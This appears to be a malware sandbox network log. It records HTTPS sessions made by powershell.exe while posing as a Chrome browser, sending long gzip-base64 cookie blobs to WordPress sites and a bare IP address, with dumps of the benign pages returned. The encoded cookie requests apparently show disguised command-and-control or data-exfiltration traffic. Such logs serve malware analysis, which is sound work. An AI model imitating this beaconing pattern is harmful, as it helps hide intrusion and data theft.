                                                    2024-12-18 10:22:42 UTC1710INData Raw: 36 61 37 0d 0a 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d
                                                    Data Ascii: 6a7range) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--
                                                    2024-12-18 10:22:42 UTC4309INData Raw: 31 30 63 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 37 2e 35 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a
                                                    Data Ascii: 10cd<link rel='stylesheet' id='contact-form-7-css' href='https://thezoneheights.co.za/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1' media='all' /><link rel='stylesheet' id='hello-elementor-css' href='https://thezoneheights.co.z
                                                    2024-12-18 10:22:42 UTC8192INData Raw: 31 66 34 30 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 46 46 46 46 46 46 22 3e 0a 09 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 33 2f 63 72 6f 70 70 65 64 2d 6c 6f 67 6f 74 7a 68 2d 33 32 78 33 32 2e 6a 70 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f
                                                    Data Ascii: 1f40<meta name="theme-color" content="#FFFFFF"><link rel="icon" href="https://thezoneheights.co.za/wp-content/uploads/2023/03/cropped-logotzh-32x32.jpg" sizes="32x32" /><link rel="icon" href="https://thezoneheights.co.za/wp-content/uploads/2023/
                                                    2024-12-18 10:22:42 UTC7817INData Raw: 2d 69 63 6f 6e 2d 6c 69 73 74 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 22 3e 0a 09 09 09 09 09 09 09 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 65 2d 66 6f 6e 74 2d 69 63 6f 6e 2d 73 76 67 20 65 2d 66 61 62 2d 6c 69 6e 6b 65 64 69 6e 2d 69 6e 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 34 38 20 35 31 32 22 20 78
                                                    Data Ascii: -icon-list-text"></span></li><li class="elementor-icon-list-item elementor-inline-item"><span class="elementor-icon-list-icon"><svg aria-hidden="true" class="e-font-icon-svg e-fab-linkedin-in" viewBox="0 0 448 512" x
                                                    2024-12-18 10:22:42 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:22:42 UTC8192INData Raw: 31 66 34 30 0d 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 77 70 2d 70 61 67 65 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 31 31 33 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 31 31 33 22 3e 0a 09 09 09 09 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 35 36 61 32 31 62 64 39 20 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 68 65 69 67 68 74 2d 6d 69 6e 2d 68 65 69 67 68 74 20 65 6c 65 6d 65 6e 74 6f 72
                                                    Data Ascii: 1f40<div data-elementor-type="wp-page" data-elementor-id="113" class="elementor elementor-113"><section class="elementor-section elementor-top-section elementor-element elementor-element-56a21bd9 elementor-section-height-min-height elementor
                                                    2024-12-18 10:22:42 UTC7822INData Raw: 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 62 65 66 6f 72 65 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 2d 2d 76 69 65 77 2d 6c 69 6e 65 5f 74 65 78 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 61 66 74 65 72 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 2d 2d 76 69 65 77 2d 6c 69 6e 65 5f 74 65 78 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 62 6f 72 64 65 72 2d 74 6f
                                                    Data Ascii: n .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:"";border-bottom:0;flex-grow:1;border-to


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.11.2049743104.26.1.2044431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:22:50 UTC2245OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: pydata.org
                                                    Connection: Close
                                                    2024-12-18 10:22:50 UTC1181INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:22:50 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding,Cookie
                                                    Link: <https://pydata.org/wp-json/>; rel="https://api.w.org/"
                                                    Link: <https://pydata.org/wp-json/wp/v2/pages/3693>; rel="alternate"; title="JSON"; type="application/json"
                                                    Link: <https://pydata.org/>; rel=shortlink
                                                    X-Powered-By: WP Engine
                                                    X-Cacheable: SHORT
                                                    Cache-Control: max-age=600, must-revalidate
                                                    X-Cache: HIT: 18
                                                    X-Cache-Group: normal
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ys49zmMZZdqUtjCRicL7zPXVV8cpiSOqfBSH7A84%2BCWjdpR%2FgIRWX%2FxVwZaUWC8sOto4%2BNxJNNMO70sUio%2F7KkLFdHmUpMXGZUJ52NRkL292SfQZ36JfNEPIGwM%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f3e6f1c3f4869ec-ATL
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=140857&min_rtt=140753&rtt_var=29761&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2864&delivery_rate=27186&cwnd=249&unsent_bytes=0&cid=44b4cb4f5211bdc5&ts=443&x=0"
                                                    2024-12-18 10:22:50 UTC188INData Raw: 32 63 33 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 79 64 61 74 61 2e 6f 72 67 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20
                                                    Data Ascii: 2c3e<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://pydata.org/xmlrpc.php"
                                                    2024-12-18 10:22:50 UTC1369INData Raw: 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 50 79 44 61 74 61 20 7c 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 3c 73 74 79 6c 65 20 69 64 3d 22 65 74 2d 62 75 69 6c 64 65 72 2d 67 6f 6f 67 6c 65 66 6f 6e 74 73 2d 63 61 63 68 65 64 2d 69 6e 6c 69 6e 65 22 3e 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70
                                                    Data Ascii: /><script type="text/javascript">document.documentElement.className = 'js';</script><title>PyData |</title><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin /><style id="et-builder-googlefonts-cached-inline">/* Original: http
                                                    2024-12-18 10:22:50 UTC1369INData Raw: 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 61 74 6f 2f 76 32 34 2f 53 36 75 5f 77 34 42 4d 55 54 50 48 6a 78 73 49 33 77 69 5f 46 51 66 6f 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 61 74 6f 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 61 74
                                                    Data Ascii: -weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wi_FQfo.ttf) format('truetype');}@font-face {font-family: 'Lato';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/lat
                                                    2024-12-18 10:22:50 UTC1369INData Raw: 44 30 65 38 66 4f 79 64 49 52 55 59 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 54 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 70 74 73 61 6e 73 2f 76 31 37 2f 6a 69 7a 61 52 45 78 55 69 54 6f 39 39 75 37 39 44 30 79 45 77 41 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 54 20 53 61
                                                    Data Ascii: D0e8fOydIRUY.ttf) format('truetype');}@font-face {font-family: 'PT Sans';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0yEwA.ttf) format('truetype');}@font-face {font-family: 'PT Sa
                                                    2024-12-18 10:22:50 UTC1369INData Raw: 77 69 5f 46 51 66 72 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 61 74 6f 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 61 74 6f 2f 76 32 34 2f 53 36 75 38 77 34 42 4d 55 54 50 48 68 33 30 41 55 69 2d 73 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 61 74 6f 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61
                                                    Data Ascii: wi_FQfr.woff) format('woff');}@font-face {font-family: 'Lato';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHh30AUi-s.woff) format('woff');}@font-face {font-family: 'Lato';font-style: norma
                                                    2024-12-18 10:22:50 UTC1369INData Raw: 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 70 74 73 61 6e 73 2f 76 31 37 2f 6a 69 7a 61 52 45 78 55 69 54 6f 39 39 75 37 39 44 30 79 45 77 77 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 54 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 70 74 73 61 6e 73 2f 76 31 37 2f 6a 69 7a 66 52 45 78 55 69 54 6f 39 39 75 37
                                                    Data Ascii: ay: swap;src: url(https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0yEww.woff) format('woff');}@font-face {font-family: 'PT Sans';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u7
                                                    2024-12-18 10:22:50 UTC1369INData Raw: 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 61 74 6f 2f 76 32 34 2f 53 36 75 38 77 34 42 4d 55 54 50 48 68 33 30 41 55 69 2d 71 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 61 74 6f 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 61 74 6f 2f 76 32 34 2f 53 36 75 39 77 34 42 4d 55 54 50 48 68 37 55 53 53 77 61 50 47 51 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74
                                                    Data Ascii: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHh30AUi-q.woff2) format('woff2');}@font-face {font-family: 'Lato';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwaPGQ.woff2) format
                                                    2024-12-18 10:22:50 UTC1369INData Raw: 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 54 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 70 74 73 61 6e 73 2f 76 31 37 2f 6a 69 7a 66 52 45 78 55 69 54 6f 39 39 75 37 39 42 5f 6d 68 30 4f 43 74 4c 51 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69
                                                    Data Ascii: t-face {font-family: 'PT Sans';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0OCtLQ.woff2) format('woff2');}</style><meta name='robots' content='max-image-preview:large' /><scri
                                                    2024-12-18 10:22:50 UTC1369INData Raw: 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 75 73 65 73 20 74 68 65 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 62 79 20 4d 6f 6e 73 74 65 72 49 6e 73 69 67 68 74 73 20 70 6c 75 67 69 6e 20 76 38 2e 32 32 2e 30 20 2d 20 55 73 69 6e 67 20 41 6e 61 6c 79 74 69 63 73 20 74 72 61 63 6b 69 6e 67 20 2d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 6f 6e 73 74 65 72 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 20 2d 2d 3e 0a 09 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 54 51 30 37 4c 5a 43 4e 56 44 22 20 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 64
                                                    Data Ascii: mments/feed/" />... This site uses the Google Analytics by MonsterInsights plugin v8.22.0 - Using Analytics tracking - https://www.monsterinsights.com/ --><script src="//www.googletagmanager.com/gtag/js?id=G-TQ07LZCNVD" data-cfasync="false" d
                                                    2024-12-18 10:22:50 UTC194INData Raw: 65 66 69 6e 65 64 27 20 3d 3d 3d 20 74 79 70 65 6f 66 20 67 61 4f 70 74 6f 75 74 29 20 7b 0a 09 09 09 09 09 66 75 6e 63 74 69 6f 6e 20 67 61 4f 70 74 6f 75 74 28 29 20 7b 0a 09 09 09 09 09 09 5f 5f 67 74 61 67 54 72 61 63 6b 65 72 4f 70 74 6f 75 74 28 29 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 7d 0a 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 0a 09 09 09 09 77 69 6e 64 6f 77 2e 4d 6f 6e 73 74 65 72 49 6e 73 69 67 68 74 73 44 75 61 6c 54 72 61 63 6b 65 72 20 3d 20 0d 0a
                                                    Data Ascii: efined' === typeof gaOptout) {function gaOptout() {__gtagTrackerOptout();}}window.dataLayer = window.dataLayer || [];window.MonsterInsightsDualTracker =


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.11.2049745197.189.243.2124438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:23:05 UTC2271OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQy07DMBD8FfIDPSHuxQSaQ9WobqnUCwrOJlnil3adNJXy8Ti4lAPywbO7M571fFaqb8kNtj5U3G8chzlTznYJMDHHKzTG2TmrtU79+mLmDCavHQHNWeNsqGlMs6LWMGfYNpM4FhJoRHWr822c2gBa+M2LKOWo/mpQ+FN/dfjBvyLN1WK/BePo+iCc8QTMuKyya5pIERpVf3D7YelYWHu/Kt6EWJ3Q3p29uwB [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
